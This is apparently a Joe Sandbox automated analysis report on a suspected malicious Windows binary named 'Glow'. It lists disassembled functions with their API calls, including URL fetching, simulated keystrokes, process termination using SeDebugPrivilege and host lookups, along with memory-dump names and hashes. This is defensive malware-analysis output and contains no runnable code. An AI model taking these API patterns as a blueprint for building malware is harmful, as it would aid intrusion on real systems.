SetEvent.KERNEL32(?), ref: 003FCBEE

Part of subcall function 003FCC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003FCCB7
Part of subcall function 003FCC98: GetLastError.KERNEL32 ref: 003FCD67
Part of subcall function 003FCC98: SetEvent.KERNEL32(?), ref: 003FCD7B
Part of subcall function 003FCC98: InternetCloseHandle.WININET(00000000), ref: 003FCD86

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 7a436a3c20420287ac570123cac0441a695110800ac86165e12cc2ae934b3eeb
Instruction ID: 7368f27db6e8f50f4a3ee17d22767d245d882d01273053a0c7926adb1006eb92
Opcode Fuzzy Hash: 7a436a3c20420287ac570123cac0441a695110800ac86165e12cc2ae934b3eeb
Instruction Fuzzy Hash: 4B316DB555070DAFDB229FA1CE44AB6BBE8FF04300B04952DFA6A86610C731D815EB60

Function 003E2EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 003E4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 003E43AD
Part of subcall function 003E4393: GetCurrentThreadId.KERNEL32 ref: 003E43B4
Part of subcall function 003E4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003E2F00), ref: 003E43BB

MapVirtualKeyW.USER32(00000025,00000000), ref: 003E2F0A
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003E2F28
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 003E2F2C
MapVirtualKeyW.USER32(00000025,00000000), ref: 003E2F36
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 003E2F4E
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 003E2F52
MapVirtualKeyW.USER32(00000025,00000000), ref: 003E2F5C
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 003E2F70
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 003E2F74

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: a20be729e4b18e17207fbf467b2bf985f0b90a2b942989a837bf31a3169e1c40
Instruction ID: 4bd4172d7b2d3009fb7213c7b79462ab7ba2a009bed95d88793da5da2b9922a6
Opcode Fuzzy Hash: a20be729e4b18e17207fbf467b2bf985f0b90a2b942989a837bf31a3169e1c40
Instruction Fuzzy Hash: AB01D8707842247BFB1067699C8AF997F5DDB4DB11F104021F318AE1E4C9E154448AAD

Function 003E2150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,003E1D95,?,?,00000000), ref: 003E2159
HeapAlloc.KERNEL32(00000000,?,003E1D95,?,?,00000000), ref: 003E2160
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,003E1D95,?,?,00000000), ref: 003E2175
GetCurrentProcess.KERNEL32(?,00000000,?,003E1D95,?,?,00000000), ref: 003E217D
DuplicateHandle.KERNEL32(00000000,?,003E1D95,?,?,00000000), ref: 003E2180
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,003E1D95,?,?,00000000), ref: 003E2190
GetCurrentProcess.KERNEL32(003E1D95,00000000,?,003E1D95,?,?,00000000), ref: 003E2198
DuplicateHandle.KERNEL32(00000000,?,003E1D95,?,?,00000000), ref: 003E219B
CreateThread.KERNEL32(00000000,00000000,003E21C1,00000000,00000000,00000000), ref: 003E21B5

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 40ab81c74d61d0c30e47eb1bdbe558a81a8f1c12c30aefc7a2efdc61115c7ff3
Instruction ID: b72fb6e99b0dc350959be30fdbb791c9ba70e15d0c48f2c4951abffdf082f236
Opcode Fuzzy Hash: 40ab81c74d61d0c30e47eb1bdbe558a81a8f1c12c30aefc7a2efdc61115c7ff3
Instruction Fuzzy Hash: 5001ACB5640344BFE710AB65DC49FA77BACEB88711F008421FA05DB1A1C6749C00CA24

Function 003ECE7B Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003841EA: _wcslen.LIBCMT ref: 003841EF

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003ECF99
_wcslen.LIBCMT ref: 003ECFE0
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003ED047
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 003ED075

Strings

,*E, xrefs: 003ECF0C
0, xrefs: 003ECF5A
<*E, xrefs: 003ECEF6

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: ,*E$0$<*E
API String ID: 1227352736-2863260501
Opcode ID: ee4e765f776b11fe7bb904305d3763a057fe5bbb4bbfff8776828d591df72b87
Instruction ID: b087a8fac3eb052c40c0492c526fd98e54a4f3603174c8e1be07f49f1ce32c91
Opcode Fuzzy Hash: ee4e765f776b11fe7bb904305d3763a057fe5bbb4bbfff8776828d591df72b87
Instruction Fuzzy Hash: A851F0716143A09FD716AF2AC845BAFB7E8AF86314F080B29F991D71D1DBB0CD068752

Function 0040AB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 003EDD87: CreateToolhelp32Snapshot.KERNEL32 ref: 003EDDAC
Part of subcall function 003EDD87: Process32FirstW.KERNEL32(00000000,?), ref: 003EDDBA
Part of subcall function 003EDD87: CloseHandle.KERNEL32(00000000), ref: 003EDE87

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0040ABCA
GetLastError.KERNEL32 ref: 0040ABDD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0040AC10
TerminateProcess.KERNEL32(00000000,00000000), ref: 0040ACC5
GetLastError.KERNEL32(00000000), ref: 0040ACD0
CloseHandle.KERNEL32(00000000), ref: 0040AD21

Strings

SeDebugPrivilege, xrefs: 0040ABEC

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 5dc0a62dd3294f51068398d58c50a6d2698e49a11ea80bfd45ffbedf9eeec9de
Instruction ID: 62e17d3b7ffd9cdd5ad4d696820be6817509fd290b15d1f2ce2164ceec07494f
Opcode Fuzzy Hash: 5dc0a62dd3294f51068398d58c50a6d2698e49a11ea80bfd45ffbedf9eeec9de
Instruction Fuzzy Hash: D5619B70208341AFE321DF14C494F66BBA1AF54308F1984ADE8665FBE2C779EC45CB96

Function 00414322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004143C1
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004143D6
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004143F0
_wcslen.LIBCMT ref: 00414435
SendMessageW.USER32(?,00001057,00000000,?), ref: 00414462
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00414490

Strings

SysListView32, xrefs: 00414393

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 1697fab20409103b8e69c0ea7e05433514ed115df520cd86f44732e6300466cf
Instruction ID: f9b7ea73c8cf204468a8831cf42cebbd694275d99904596a1bf61d74da894d2f
Opcode Fuzzy Hash: 1697fab20409103b8e69c0ea7e05433514ed115df520cd86f44732e6300466cf
Instruction Fuzzy Hash: 5C41C271A00319ABDF219F64CC49BEB7BA9FF48350F10052BF958E7291D7799980CB98

Function 003EC625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003EC6C4
IsMenu.USER32(00000000), ref: 003EC6E4
CreatePopupMenu.USER32 ref: 003EC71A
GetMenuItemCount.USER32(01395910), ref: 003EC76B
InsertMenuItemW.USER32(01395910,?,00000001,00000030), ref: 003EC793

Strings

2, xrefs: 003EC6FE
0, xrefs: 003EC66F

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: a837c0f11b0ef361bfa8867e844254da1c8df32eb5e44288d598e7afd4a5c7f8
Instruction ID: e881a9b829d50f85150c3934ec9ccf90dc620ba08c9d86cd546a99f771c50117
Opcode Fuzzy Hash: a837c0f11b0ef361bfa8867e844254da1c8df32eb5e44288d598e7afd4a5c7f8
Instruction Fuzzy Hash: BD518071A102A59FDF12CF6AC884AAEBBF9BF44314F24921AE9119B2D1D3709942CF51

Function 003819CD Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 003819E1
ScreenToClient.USER32(00000000,?), ref: 003819FE
GetAsyncKeyState.USER32(00000001), ref: 00381A23
GetAsyncKeyState.USER32(00000002), ref: 00381A3D

Strings

$'8, xrefs: 003C31C3, 003C3164, 003C318D
$'8, xrefs: 003819F0, 00381A07, 003C3135

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID: $'8$$'8
API String ID: 4210589936-3484801174
Opcode ID: 83b020ff16ff69f410316e1b7f216eb9eff14155f46df1a2a94889bac14e931c
Instruction ID: 77da97400f6975f75b2cfbeb4bc354080d8e465d01127eaca687bf168fef980a
Opcode Fuzzy Hash: 83b020ff16ff69f410316e1b7f216eb9eff14155f46df1a2a94889bac14e931c
Instruction Fuzzy Hash: E0416171A0420AFFDF1AEF64C844BFEB778FB05324F25825AE469A6290C7345E54CB91

Function 00381B00 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0

BeginPaint.USER32(?,?,?), ref: 00381B35
GetWindowRect.USER32(?,?), ref: 00381B99
ScreenToClient.USER32(?,?), ref: 00381BB6
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00381BC7
EndPaint.USER32(?,?,?,?,?), ref: 00381C15
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 003C3287

Part of subcall function 00381C2D: BeginPath.GDI32(00000000), ref: 00381C4B

Strings

(E, xrefs: 00381B0F

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID: (E
API String ID: 3050599898-3218771753
Opcode ID: 799dacfcea8fdff5b4cbd07089573a024e4035556adf65b386b19bd452052876
Instruction ID: 4bad0b4ea45d4fdb2a40dd6a105f524f92650a8c934099c6ea1a30ab7b2d371e
Opcode Fuzzy Hash: 799dacfcea8fdff5b4cbd07089573a024e4035556adf65b386b19bd452052876
Instruction Fuzzy Hash: C441A1B0604300AFCB12EF24DC84FB67BBCEB46325F044669F9548B2A2C7709D45DB62

Function 004186FC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00418740
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00418765
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0041877D
GetSystemMetrics.USER32(00000004), ref: 004187A6
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,003FC1F2,00000000), ref: 004187C6

Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0

GetSystemMetrics.USER32(00000004), ref: 004187B1

Strings

(E, xrefs: 00418709

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID: (E
API String ID: 2294984445-3218771753
Opcode ID: 02fb5bc9b3a658c59f6f82f8e25180262d1a7b83d876207164b80c07b8115bcc
Instruction ID: 133ddcd707a7f5e4996807b642fafe386d5c8dd7071a8fa5cfaa911258cfe919
Opcode Fuzzy Hash: 02fb5bc9b3a658c59f6f82f8e25180262d1a7b83d876207164b80c07b8115bcc
Instruction Fuzzy Hash: A92183716106519FCB145F38DC04AAB37A5FB85365F24473EF936C22E0DB748890CB58

Function 003ED11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 003ED1BE

Strings

question, xrefs: 003ED177
info, xrefs: 003ED15F
warning, xrefs: 003ED1A7
stop, xrefs: 003ED18F
blank, xrefs: 003ED140

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 2df32ace68e6e1746c649e56811e6d4284418faa19d738faf3e5b7a70895735d
Instruction ID: e6ff42c8de43148cef561031b72febe283271c217cf494c04d737ca3a5311721
Opcode Fuzzy Hash: 2df32ace68e6e1746c649e56811e6d4284418faa19d738faf3e5b7a70895735d
Instruction Fuzzy Hash: 37112C3564C3A6BEF7075B15DC82DAA779CDF06760B21012AF900AA5C3E7F8AA014164

Function 003EE73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 003EE759
gethostname.WSOCK32(?,00000100), ref: 003EE773
gethostbyname.WSOCK32(?), ref: 003EE780
inet_ntoa.WSOCK32(?), ref: 003EE7C2
_strcat.LIBCMT ref: 003EE7D0
WSACleanup.WSOCK32 ref: 003EE7F5

Strings

0.0.0.0, xrefs: 003EE79E

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: 1abcf95e20cf5542a1f94c9610efe8c97a020c20492f7e2bebe814d1d73086c8
Instruction ID: 3a83d6bff257d26ffa54c59acb29a115acfcd26521202f9d9bb51d9c639884ab
Opcode Fuzzy Hash: 1abcf95e20cf5542a1f94c9610efe8c97a020c20492f7e2bebe814d1d73086c8
Instruction Fuzzy Hash: F611E4719002247FDB266B61DC4AEDA37ACEF41710F010175F525AA0D1EFB88A81CB54

Function 003EF630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 003EF641
_wcslen.LIBCMT ref: 003EF652
_wcslen.LIBCMT ref: 003EF690
_wcslen.LIBCMT ref: 003EF6C6
_wcslen.LIBCMT ref: 003EF6F6
_wcslen.LIBCMT ref: 003EF706
_wcslen.LIBCMT ref: 003EF742
_wcslen.LIBCMT ref: 003EF771

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: d335c4d512dd45375a8894a09789c263230b76d39cac6a3be7fbe2e4b217a5a3
Instruction ID: 0af015320513afee02381e939a74c3dd38162064a1f4f2ca5984a0f5392ec7b0
Opcode Fuzzy Hash: d335c4d512dd45375a8894a09789c263230b76d39cac6a3be7fbe2e4b217a5a3
Instruction Fuzzy Hash: 6141D565C10514BACB12EBB8CC8AACFB3A8EF06310F418662E50CE7171FA74D251C3A6

Function 0041379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 004137B7
GetDC.USER32(00000000), ref: 004137BF
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004137CA
ReleaseDC.USER32(00000000,00000000), ref: 004137D6
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00413812
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00413823
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00416504,?,?,000000FF,00000000,?,000000FF,?), ref: 0041385E
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 0041387D

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: d09dadbe7f49d12975eba0be81251b599cfd110a89569c60dd3f38c44f802ab9
Instruction ID: 8e4862e2759325fd32e689c3ce39e3f7c2d4d7c4bbeb4391887732675f43c4f1
Opcode Fuzzy Hash: d09dadbe7f49d12975eba0be81251b599cfd110a89569c60dd3f38c44f802ab9
Instruction Fuzzy Hash: B231B1B2601214BFEB114F50CC89FEB3FADEF49751F044065FE089A291C6B99D81C7A8

Function 00405A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00405A64
NULL Pointer assignment, xrefs: 00405A8B, 00405DE0

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: c56d3d18686d50db2c69a6fecba8d24e187e2591c69f04f028a6175428ae3189
Instruction ID: f8fb3a08b9aee723001f4ff3733d194de0a18bdc23db3729c93f570972d778f5
Opcode Fuzzy Hash: c56d3d18686d50db2c69a6fecba8d24e187e2591c69f04f028a6175428ae3189
Instruction Fuzzy Hash: 6FD1AD71A0060A9FDB10DFA8C885AAFB7B5FF48304F14857AE915AB281E774AD41CF64

Function 003C18A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,003C1B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 003C194E
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,003C1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 003C19D1
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,003C1B7B,?,003C1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 003C1A64
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,003C1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 003C1A7B

Part of subcall function 003B3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,003A6A79,?,0000015D,?,?,?,?,003A85B0,000000FF,00000000,?,?), ref: 003B3BC5

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,003C1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 003C1AF7
__freea.LIBCMT ref: 003C1B22
__freea.LIBCMT ref: 003C1B2E

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
